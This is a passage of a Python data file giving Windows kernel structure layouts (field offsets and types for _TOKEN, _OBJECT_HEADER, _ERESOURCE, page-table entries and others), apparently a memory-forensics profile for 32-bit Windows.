'Level' : [ 0x4, ['unsigned char']],
'Reserved1' : [ 0x5, ['unsigned char']],
'LoggerId' : [ 0x6, ['unsigned short']],
'EnableProperty' : [ 0x8, ['unsigned long']],
'Reserved2' : [ 0xc, ['unsigned long']],
'MatchAnyKeyword' : [ 0x10, ['unsigned long long']],
'MatchAllKeyword' : [ 0x18, ['unsigned long long']],
} ],
'_LUID_AND_ATTRIBUTES' : [ 0xc, {
'Luid' : [ 0x0, ['_LUID']],
'Attributes' : [ 0x8, ['unsigned long']],
} ],
'_TOKEN' : [ 0x1e0, {
'TokenSource' : [ 0x0, ['_TOKEN_SOURCE']],
'TokenId' : [ 0x10, ['_LUID']],
'AuthenticationId' : [ 0x18, ['_LUID']],
'ParentTokenId' : [ 0x20, ['_LUID']],
'ExpirationTime' : [ 0x28, ['_LARGE_INTEGER']],
'TokenLock' : [ 0x30, ['pointer', ['_ERESOURCE']]],
'ModifiedId' : [ 0x34, ['_LUID']],
'Privileges' : [ 0x40, ['_SEP_TOKEN_PRIVILEGES']],
'AuditPolicy' : [ 0x58, ['_SEP_AUDIT_POLICY']],
'SessionId' : [ 0x74, ['unsigned long']],
'UserAndGroupCount' : [ 0x78, ['unsigned long']],
'RestrictedSidCount' : [ 0x7c, ['unsigned long']],
'VariableLength' : [ 0x80, ['unsigned long']],
'DynamicCharged' : [ 0x84, ['unsigned long']],
'DynamicAvailable' : [ 0x88, ['unsigned long']],
'DefaultOwnerIndex' : [ 0x8c, ['unsigned long']],
'UserAndGroups' : [ 0x90, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'RestrictedSids' : [ 0x94, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'PrimaryGroup' : [ 0x98, ['pointer', ['void']]],
'DynamicPart' : [ 0x9c, ['pointer', ['unsigned long']]],
'DefaultDacl' : [ 0xa0, ['pointer', ['_ACL']]],
'TokenType' : [ 0xa4, ['Enumeration', dict(target = 'long', choices = {1: 'TokenPrimary', 2: 'TokenImpersonation'})]],
'ImpersonationLevel' : [ 0xa8, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'TokenFlags' : [ 0xac, ['unsigned long']],
'TokenInUse' : [ 0xb0, ['unsigned char']],
'IntegrityLevelIndex' : [ 0xb4, ['unsigned long']],
'MandatoryPolicy' : [ 0xb8, ['unsigned long']],
'LogonSession' : [ 0xbc, ['pointer', ['_SEP_LOGON_SESSION_REFERENCES']]],
'OriginatingLogonSession' : [ 0xc0, ['_LUID']],
'SidHash' : [ 0xc8, ['_SID_AND_ATTRIBUTES_HASH']],
'RestrictedSidHash' : [ 0x150, ['_SID_AND_ATTRIBUTES_HASH']],
'pSecurityAttributes' : [ 0x1d8, ['pointer', ['_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION']]],
'VariablePart' : [ 0x1dc, ['unsigned long']],
} ],
'_SEP_LOGON_SESSION_REFERENCES' : [ 0x34, {
'Next' : [ 0x0, ['pointer', ['_SEP_LOGON_SESSION_REFERENCES']]],
'LogonId' : [ 0x4, ['_LUID']],
'BuddyLogonId' : [ 0xc, ['_LUID']],
'ReferenceCount' : [ 0x14, ['unsigned long']],
'Flags' : [ 0x18, ['unsigned long']],
'pDeviceMap' : [ 0x1c, ['pointer', ['_DEVICE_MAP']]],
'Token' : [ 0x20, ['pointer', ['void']]],
'AccountName' : [ 0x24, ['_UNICODE_STRING']],
'AuthorityName' : [ 0x2c, ['_UNICODE_STRING']],
} ],
'_OBJECT_HEADER' : [ 0x20, {
'PointerCount' : [ 0x0, ['long']],
'HandleCount' : [ 0x4, ['long']],
'NextToFree' : [ 0x4, ['pointer', ['void']]],
'Lock' : [ 0x8, ['_EX_PUSH_LOCK']],
'TypeIndex' : [ 0xc, ['unsigned char']],
'TraceFlags' : [ 0xd, ['unsigned char']],
'InfoMask' : [ 0xe, ['unsigned char']],
'Flags' : [ 0xf, ['unsigned char']],
'ObjectCreateInfo' : [ 0x10, ['pointer', ['_OBJECT_CREATE_INFORMATION']]],
'QuotaBlockCharged' : [ 0x10, ['pointer', ['void']]],
'SecurityDescriptor' : [ 0x14, ['pointer', ['void']]],
'Body' : [ 0x18, ['_QUAD']],
} ],
'_OBJECT_HEADER_QUOTA_INFO' : [ 0x10, {
'PagedPoolCharge' : [ 0x0, ['unsigned long']],
'NonPagedPoolCharge' : [ 0x4, ['unsigned long']],
'SecurityDescriptorCharge' : [ 0x8, ['unsigned long']],
'SecurityDescriptorQuotaBlock' : [ 0xc, ['pointer', ['void']]],
} ],
'_OBJECT_HEADER_PROCESS_INFO' : [ 0x8, {
'ExclusiveProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
'Reserved' : [ 0x4, ['unsigned long']],
} ],
'_OBJECT_HEADER_HANDLE_INFO' : [ 0x8, {
'HandleCountDataBase' : [ 0x0, ['pointer', ['_OBJECT_HANDLE_COUNT_DATABASE']]],
'SingleEntry' : [ 0x0, ['_OBJECT_HANDLE_COUNT_ENTRY']],
} ],
'_OBJECT_HEADER_NAME_INFO' : [ 0x10, {
'Directory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'Name' : [ 0x4, ['_UNICODE_STRING']],
'ReferenceCount' : [ 0xc, ['long']],
} ],
'_OBJECT_HEADER_CREATOR_INFO' : [ 0x10, {
'TypeList' : [ 0x0, ['_LIST_ENTRY']],
'CreatorUniqueProcess' : [ 0x8, ['pointer', ['void']]],
'CreatorBackTraceIndex' : [ 0xc, ['unsigned short']],
'Reserved' : [ 0xe, ['unsigned short']],
} ],
'_OBP_LOOKUP_CONTEXT' : [ 0x14, {
'Directory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'Object' : [ 0x4, ['pointer', ['void']]],
'HashValue' : [ 0x8, ['unsigned long']],
'HashIndex' : [ 0xc, ['unsigned short']],
'DirectoryLocked' : [ 0xe, ['unsigned char']],
'LockedExclusive' : [ 0xf, ['unsigned char']],
'LockStateSignature' : [ 0x10, ['unsigned long']],
} ],
'_OBJECT_DIRECTORY' : [ 0xa8, {
'HashBuckets' : [ 0x0, ['array', 37, ['pointer', ['_OBJECT_DIRECTORY_ENTRY']]]],
'Lock' : [ 0x94, ['_EX_PUSH_LOCK']],
'DeviceMap' : [ 0x98, ['pointer', ['_DEVICE_MAP']]],
'SessionId' : [ 0x9c, ['unsigned long']],
'NamespaceEntry' : [ 0xa0, ['pointer', ['void']]],
'Flags' : [ 0xa4, ['unsigned long']],
} ],
'_PS_CLIENT_SECURITY_CONTEXT' : [ 0x4, {
'ImpersonationData' : [ 0x0, ['unsigned long']],
'ImpersonationToken' : [ 0x0, ['pointer', ['void']]],
'ImpersonationLevel' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'EffectiveOnly' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
} ],
'_DBGKD_ANY_CONTROL_SET' : [ 0x1c, {
'X86ControlSet' : [ 0x0, ['_X86_DBGKD_CONTROL_SET']],
'AlphaControlSet' : [ 0x0, ['unsigned long']],
'IA64ControlSet' : [ 0x0, ['_IA64_DBGKD_CONTROL_SET']],
'Amd64ControlSet' : [ 0x0, ['_AMD64_DBGKD_CONTROL_SET']],
'ArmControlSet' : [ 0x0, ['_ARM_DBGKD_CONTROL_SET']],
'PpcControlSet' : [ 0x0, ['_PPC_DBGKD_CONTROL_SET']],
} ],
'_MMVAD_FLAGS3' : [ 0x4, {
'PreferredNode' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 6, native_type='unsigned long')]],
'Teb' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SequentialAccess' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'LastSequentialTrim' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 24, native_type='unsigned long')]],
'Spare2' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_MI_VERIFIER_POOL_HEADER' : [ 0x4, {
'VerifierPoolEntry' : [ 0x0, ['pointer', ['_VI_POOL_ENTRY']]],
} ],
'_HBASE_BLOCK' : [ 0x1000, {
'Signature' : [ 0x0, ['unsigned long']],
'Sequence1' : [ 0x4, ['unsigned long']],
'Sequence2' : [ 0x8, ['unsigned long']],
'TimeStamp' : [ 0xc, ['_LARGE_INTEGER']],
'Major' : [ 0x14, ['unsigned long']],
'Minor' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['unsigned long']],
'Format' : [ 0x20, ['unsigned long']],
'RootCell' : [ 0x24, ['unsigned long']],
'Length' : [ 0x28, ['unsigned long']],
'Cluster' : [ 0x2c, ['unsigned long']],
'FileName' : [ 0x30, ['array', 64, ['unsigned char']]],
'RmId' : [ 0x70, ['_GUID']],
'LogId' : [ 0x80, ['_GUID']],
'Flags' : [ 0x90, ['unsigned long']],
'TmId' : [ 0x94, ['_GUID']],
'GuidSignature' : [ 0xa4, ['unsigned long']],
'Reserved1' : [ 0xa8, ['array', 85, ['unsigned long']]],
'CheckSum' : [ 0x1fc, ['unsigned long']],
'Reserved2' : [ 0x200, ['array', 882, ['unsigned long']]],
'ThawTmId' : [ 0xfc8, ['_GUID']],
'ThawRmId' : [ 0xfd8, ['_GUID']],
'ThawLogId' : [ 0xfe8, ['_GUID']],
'BootType' : [ 0xff8, ['unsigned long']],
'BootRecover' : [ 0xffc, ['unsigned long']],
} ],
'_ERESOURCE' : [ 0x38, {
'SystemResourcesList' : [ 0x0, ['_LIST_ENTRY']],
'OwnerTable' : [ 0x8, ['pointer', ['_OWNER_ENTRY']]],
'ActiveCount' : [ 0xc, ['short']],
'Flag' : [ 0xe, ['unsigned short']],
'SharedWaiters' : [ 0x10, ['pointer', ['_KSEMAPHORE']]],
'ExclusiveWaiters' : [ 0x14, ['pointer', ['_KEVENT']]],
'OwnerEntry' : [ 0x18, ['_OWNER_ENTRY']],
'ActiveEntries' : [ 0x20, ['unsigned long']],
'ContentionCount' : [ 0x24, ['unsigned long']],
'NumberOfSharedWaiters' : [ 0x28, ['unsigned long']],
'NumberOfExclusiveWaiters' : [ 0x2c, ['unsigned long']],
'Address' : [ 0x30, ['pointer', ['void']]],
'CreatorBackTraceIndex' : [ 0x30, ['unsigned long']],
'SpinLock' : [ 0x34, ['unsigned long']],
} ],
'_ARM_DBGKD_CONTROL_SET' : [ 0xc, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long']],
'CurrentSymbolEnd' : [ 0x8, ['unsigned long']],
} ],
'_LPCP_MESSAGE' : [ 0x30, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'FreeEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Reserved0' : [ 0x4, ['unsigned long']],
'SenderPort' : [ 0x8, ['pointer', ['void']]],
'RepliedToThread' : [ 0xc, ['pointer', ['_ETHREAD']]],
'PortContext' : [ 0x10, ['pointer', ['void']]],
'Request' : [ 0x18, ['_PORT_MESSAGE']],
} ],
'_HARDWARE_PTE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Dirty' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'LargePage' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Global' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'reserved' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_DUAL' : [ 0x13c, {
'Length' : [ 0x0, ['unsigned long']],
'Map' : [ 0x4, ['pointer', ['_HMAP_DIRECTORY']]],
'SmallDir' : [ 0x8, ['pointer', ['_HMAP_TABLE']]],
'Guard' : [ 0xc, ['unsigned long']],
'FreeDisplay' : [ 0x10, ['array', 24, ['_FREE_DISPLAY']]],
'FreeSummary' : [ 0x130, ['unsigned long']],
'FreeBins' : [ 0x134, ['_LIST_ENTRY']],
} ],
'_ALPC_PORT_ATTRIBUTES' : [ 0x2c, {
'Flags' : [ 0x0, ['unsigned long']],
'SecurityQos' : [ 0x4, ['_SECURITY_QUALITY_OF_SERVICE']],
'MaxMessageLength' : [ 0x10, ['unsigned long']],
'MemoryBandwidth' : [ 0x14, ['unsigned long']],
'MaxPoolUsage' : [ 0x18, ['unsigned long']],
'MaxSectionSize' : [ 0x1c, ['unsigned long']],
'MaxViewSize' : [ 0x20, ['unsigned long']],
'MaxTotalSectionSize' : [ 0x24, ['unsigned long']],
'DupObjectTypes' : [ 0x28, ['unsigned long']],
} ],
'_CM_INDEX_HINT_BLOCK' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'HashKey' : [ 0x4, ['array', 1, ['unsigned long']]],
} ],
'_KQUEUE' : [ 0x28, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'EntryListHead' : [ 0x10, ['_LIST_ENTRY']],
'CurrentCount' : [ 0x18, ['unsigned long']],
'MaximumCount' : [ 0x1c, ['unsigned long']],
'ThreadListHead' : [ 0x20, ['_LIST_ENTRY']],
} ],
'_KSTACK_COUNT' : [ 0x4, {
'Value' : [ 0x0, ['long']],
'State' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'StackCount' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
} ],
'_DISPATCHER_HEADER' : [ 0x10, {
'Type' : [ 0x0, ['unsigned char']],
'TimerControlFlags' : [ 0x1, ['unsigned char']],
'Absolute' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Coalescable' : [ 0x1, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'KeepShifting' : [ 0x1, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'EncodedTolerableDelay' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
'Abandoned' : [ 0x1, ['unsigned char']],
'Signalling' : [ 0x1, ['unsigned char']],
'ThreadControlFlags' : [ 0x2, ['unsigned char']],
'CpuThrottled' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'CycleProfiling' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'CounterProfiling' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Reserved' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
'Hand' : [ 0x2, ['unsigned char']],
'Size' : [ 0x2, ['unsigned char']],
'TimerMiscFlags' : [ 0x3, ['unsigned char']],
'Index' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Processor' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 6, native_type='unsigned char')]],
'Inserted' : [ 0x3, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Expired' : [ 0x3, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'DebugActive' : [ 0x3, ['unsigned char']],
'ActiveDR7' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Instrumented' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Reserved2' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned char')]],
'UmsScheduled' : [ 0x3, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'UmsPrimary' : [ 0x3, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'DpcActive' : [ 0x3, ['unsigned char']],
'Lock' : [ 0x0, ['long']],
'SignalState' : [ 0x4, ['long']],
'WaitListHead' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_VI_POOL_ENTRY' : [ 0x10, {
'PageHeader' : [ 0x0, ['_VI_POOL_PAGE_HEADER']],
'InUse' : [ 0x0, ['_VI_POOL_ENTRY_INUSE']],
'NextFree' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
} ],
'_MM_PAGE_ACCESS_INFO' : [ 0x8, {
'Flags' : [ 0x0, ['_MM_PAGE_ACCESS_INFO_FLAGS']],
'FileOffset' : [ 0x0, ['unsigned long long']],
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'DontUse0' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Spare0' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'PointerProtoPte' : [ 0x4, ['pointer', ['void']]],
} ],
'_HEAP_COUNTERS' : [ 0x54, {
'TotalMemoryReserved' : [ 0x0, ['unsigned long']],
'TotalMemoryCommitted' : [ 0x4, ['unsigned long']],
'TotalMemoryLargeUCR' : [ 0x8, ['unsigned long']],
'TotalSizeInVirtualBlocks' : [ 0xc, ['unsigned long']],
'TotalSegments' : [ 0x10, ['unsigned long']],
'TotalUCRs' : [ 0x14, ['unsigned long']],
'CommittOps' : [ 0x18, ['unsigned long']],
'DeCommitOps' : [ 0x1c, ['unsigned long']],
'LockAcquires' : [ 0x20, ['unsigned long']],
'LockCollisions' : [ 0x24, ['unsigned long']],
'CommitRate' : [ 0x28, ['unsigned long']],
'DecommittRate' : [ 0x2c, ['unsigned long']],
'CommitFailures' : [ 0x30, ['unsigned long']],
'InBlockCommitFailures' : [ 0x34, ['unsigned long']],
'CompactHeapCalls' : [ 0x38, ['unsigned long']],
'CompactedUCRs' : [ 0x3c, ['unsigned long']],
'AllocAndFreeOps' : [ 0x40, ['unsigned long']],
'InBlockDeccommits' : [ 0x44, ['unsigned long']],
'InBlockDeccomitSize' : [ 0x48, ['unsigned long']],
'HighWatermarkSize' : [ 0x4c, ['unsigned long']],
'LastPolledSize' : [ 0x50, ['unsigned long']],
} ],
'_CM_KEY_HASH' : [ 0x10, {
'ConvKey' : [ 0x0, ['unsigned long']],
'NextHash' : [ 0x4, ['pointer', ['_CM_KEY_HASH']]],
'KeyHive' : [ 0x8, ['pointer', ['_HHIVE']]],
'KeyCell' : [ 0xc, ['unsigned long']],
} ],
'_SYSPTES_HEADER' : [ 0x14, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
'Count' : [ 0x8, ['unsigned long']],
'NumberOfEntries' : [ 0xc, ['unsigned long']],
'NumberOfEntriesPeak' : [ 0x10, ['unsigned long']],
} ],
'_EXCEPTION_RECORD' : [ 0x50, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['pointer', ['_EXCEPTION_RECORD']]],
'ExceptionAddress' : [ 0xc, ['pointer', ['void']]],
'NumberParameters' : [ 0x10, ['unsigned long']],
'ExceptionInformation' : [ 0x14, ['array', 15, ['unsigned long']]],
} ],
'_PENDING_RELATIONS_LIST_ENTRY' : [ 0x3c, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'WorkItem' : [ 0x8, ['_WORK_QUEUE_ITEM']],
'DeviceEvent' : [ 0x18, ['pointer', ['_PNP_DEVICE_EVENT_ENTRY']]],
'DeviceObject' : [ 0x1c, ['pointer', ['_DEVICE_OBJECT']]],
'RelationsList' : [ 0x20, ['pointer', ['_RELATION_LIST']]],
'EjectIrp' : [ 0x24, ['pointer', ['_IRP']]],
'Lock' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'IRPLOCK_CANCELABLE', 1: 'IRPLOCK_CANCEL_STARTED', 2: 'IRPLOCK_CANCEL_COMPLETE', 3: 'IRPLOCK_COMPLETED'})]],
'Problem' : [ 0x2c, ['unsigned long']],
'ProfileChangingEject' : [ 0x30, ['unsigned char']],
'DisplaySafeRemovalDialog' : [ 0x31, ['unsigned char']],
'LightestSleepState' : [ 0x34, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DockInterface' : [ 0x38, ['pointer', ['DOCK_INTERFACE']]],
} ],
'_I386_LOADER_BLOCK' : [ 0xc, {
'CommonDataArea' : [ 0x0, ['pointer', ['void']]],
'MachineType' : [ 0x4, ['unsigned long']],
'VirtualBias' : [ 0x8, ['unsigned long']],
} ],
'_CELL_DATA' : [ 0x50, {
'u' : [ 0x0, ['_u']],
} ],
'_ARC_DISK_INFORMATION' : [ 0x8, {
'DiskSignatures' : [ 0x0, ['_LIST_ENTRY']],
} ],
'_INITIAL_PRIVILEGE_SET' : [ 0x2c, {
'PrivilegeCount' : [ 0x0, ['unsigned long']],
'Control' : [ 0x4, ['unsigned long']],
'Privilege' : [ 0x8, ['array', 3, ['_LUID_AND_ATTRIBUTES']]],
} ],
'_HEAP_TUNING_PARAMETERS' : [ 0x8, {
'CommittThresholdShift' : [ 0x0, ['unsigned long']],
'MaxPreCommittThreshold' : [ 0x4, ['unsigned long']],
} ],
'_MMWSLE_NONDIRECT_HASH' : [ 0x8, {
'Key' : [ 0x0, ['pointer', ['void']]],
'Index' : [ 0x4, ['unsigned long']],
} ],
'_HMAP_DIRECTORY' : [ 0x1000, {
'Directory' : [ 0x0, ['array', 1024, ['pointer', ['_HMAP_TABLE']]]],
} ],
'_HANDLE_TABLE' : [ 0x3c, {
'TableCode' : [ 0x0, ['unsigned long']],
'QuotaProcess' : [ 0x4, ['pointer', ['_EPROCESS']]],
'UniqueProcessId' : [ 0x8, ['pointer', ['void']]],
'HandleLock' : [ 0xc, ['_EX_PUSH_LOCK']],
'HandleTableList' : [ 0x10, ['_LIST_ENTRY']],
'HandleContentionEvent' : [ 0x18, ['_EX_PUSH_LOCK']],
'DebugInfo' : [ 0x1c, ['pointer', ['_HANDLE_TRACE_DEBUG_INFO']]],
'ExtraInfoPages' : [ 0x20, ['long']],
'Flags' : [ 0x24, ['unsigned long']],
'StrictFIFO' : [ 0x24, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'FirstFreeHandle' : [ 0x28, ['unsigned long']],
'LastFreeHandleEntry' : [ 0x2c, ['pointer', ['_HANDLE_TABLE_ENTRY']]],
'HandleCount' : [ 0x30, ['unsigned long']],
'NextHandleNeedingPool' : [ 0x34, ['unsigned long']],
'HandleCountHighWatermark' : [ 0x38, ['unsigned long']],
} ],
'_POOL_TRACKER_BIG_PAGES' : [ 0x10, {
'Va' : [ 0x0, ['pointer', ['void']]],
'Key' : [ 0x4, ['unsigned long']],
'PoolType' : [ 0x8, ['unsigned long']],
'NumberOfBytes' : [ 0xc, ['unsigned long']],
} ],
'_MMVAD_FLAGS2' : [ 0x4, {
'FileOffset' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long')]],
'SecNoChange' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'OneSecured' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'MultipleSecured' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 27, end_bit = 28, native_type='unsigned long')]],
'LongVad' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 29, native_type='unsigned long')]],
'ExtendableFile' : [ 0x0, ['BitField', dict(start_bit = 29, end_bit = 30, native_type='unsigned long')]],
'Inherit' : [ 0x0, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
} ],
'_TEB_ACTIVE_FRAME' : [ 0xc, {
'Flags' : [ 0x0, ['unsigned long']],
'Previous' : [ 0x4, ['pointer', ['_TEB_ACTIVE_FRAME']]],
'Context' : [ 0x8, ['pointer', ['_TEB_ACTIVE_FRAME_CONTEXT']]],
} ],
'_FILE_GET_QUOTA_INFORMATION' : [ 0x14, {
'NextEntryOffset' : [ 0x0, ['unsigned long']],
'SidLength' : [ 0x4, ['unsigned long']],
'Sid' : [ 0x8, ['_SID']],
} ],
'_ACCESS_REASONS' : [ 0x80, {
'Data' : [ 0x0, ['array', 32, ['unsigned long']]],
} ],
'_CM_KEY_BODY' : [ 0x2c, {
'Type' : [ 0x0, ['unsigned long']],
'KeyControlBlock' : [ 0x4, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NotifyBlock' : [ 0x8, ['pointer', ['_CM_NOTIFY_BLOCK']]],
'ProcessID' : [ 0xc, ['pointer', ['void']]],
'KeyBodyList' : [ 0x10, ['_LIST_ENTRY']],
'Flags' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'HandleTags' : [ 0x18, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'KtmTrans' : [ 0x1c, ['pointer', ['void']]],
'KtmUow' : [ 0x20, ['pointer', ['_GUID']]],
'ContextListHead' : [ 0x24, ['_LIST_ENTRY']],
} ],
'_KWAIT_BLOCK' : [ 0x18, {
'WaitListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Thread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'Object' : [ 0xc, ['pointer', ['void']]],
'NextWaitBlock' : [ 0x10, ['pointer', ['_KWAIT_BLOCK']]],
'WaitKey' : [ 0x14, ['unsigned short']],
'WaitType' : [ 0x16, ['unsigned char']],
'BlockState' : [ 0x17, ['unsigned char']],
} ],
'_MMPTE_PROTOTYPE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ProtoAddressLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 9, native_type='unsigned long')]],
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'ProtoAddressHigh' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 32, native_type='unsigned long')]],
} ],
'_WHEA_ERROR_PACKET_FLAGS' : [ 0x4, {
'PreviousError' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HypervisorError' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Simulated' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'PlatformPfaControl' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'PlatformDirectedOffline' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_THERMAL_INFORMATION_EX' : [ 0x58, {
'ThermalStamp' : [ 0x0, ['unsigned long']],
'ThermalConstant1' : [ 0x4, ['unsigned long']],
'ThermalConstant2' : [ 0x8, ['unsigned long']],
'Processors' : [ 0xc, ['_KAFFINITY_EX']],
'SamplingPeriod' : [ 0x18, ['unsigned long']],
'CurrentTemperature' : [ 0x1c, ['unsigned long']],
'PassiveTripPoint' : [ 0x20, ['unsigned long']],
'CriticalTripPoint' : [ 0x24, ['unsigned long']],
'ActiveTripPointCount' : [ 0x28, ['unsigned char']],
'ActiveTripPoint' : [ 0x2c, ['array', 10, ['unsigned long']]],
'S4TransitionTripPoint' : [ 0x54, ['unsigned long']],
} ],
'__unnamed_1c1b' : [ 0x4, {
'FilePointerIndex' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned long')]],
'HardFault' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Image' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Spare0' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
} ],
'__unnamed_1c1d' : [ 0x4, {
'FilePointerIndex' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned long')]],
